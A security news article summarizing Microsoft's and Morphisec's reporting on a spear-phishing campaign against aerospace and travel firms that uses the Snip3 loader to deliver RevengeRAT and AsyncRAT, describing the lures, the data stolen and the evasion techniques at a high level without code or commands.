Microsoft describes an ongoing spear-phishing campaign targeting aerospace and travel organizations with remote access Trojans (RATs).
For the past few months, Microsoft has been tracking a campaign in which hackers use spear-phishing emails distributing a new loader that delivers RevengeRAT or AsyncRAT.
Attackers send phishing emails that use image lures posing as PDF documents tailored to be relevant to a certain industry sector, such as aviation, travel, or cargo.
Microsoft says the threat actors are after the victim’s data from their infected devices which they harvest and exfiltrate using the remote control, keylogging, and password-stealing capabilities of the RATs. The malware’s operators can successfully steal credentials, screenshots, browser data, webcam data, clipboard data, and system and network information. The RATs then exfiltrate the data via SMTP Port 587.
Microsoft’s security team described a new loader that threat actors rent to other hackers in a Crypter-as-a-Service model. First discovered by Morphisec security firm, the Snip3 loader has been observed dropping Revenge RAT, AsyncRAT, Agent Tesla, and NetWire RAT payloads on compromised systems.
“The Crypter is most commonly delivered through phishing emails, which lead to the download of a visual basic file. In some cases, however, the attack chain starts with a large install file, such as an Adobe installer, which bundles the next stage,“ Morphisec experts say.
Snip3 can identify sandboxing and virtual environments, according to Morphisec, and thus effectively avoid detection by anti-malware solutions.
The malware loader uses other techniques as well evade detection:
- PowerShell code with the ‘remotesigned’ parameter
- Pastebin and top4top for staging
- RunPE loaders on the endpoint in runtime
For administrators who want to secure their system against this ongoing phishing campaign, Microsoft shared sample queries for advanced hunting using Microsoft 365 Defender to help them detect suspicious behavior.
Additionally, Morphisec has provided indicators of compromise associated with this spear-phishing campaign, malware sample hashes, and RAT command and control domains in their report.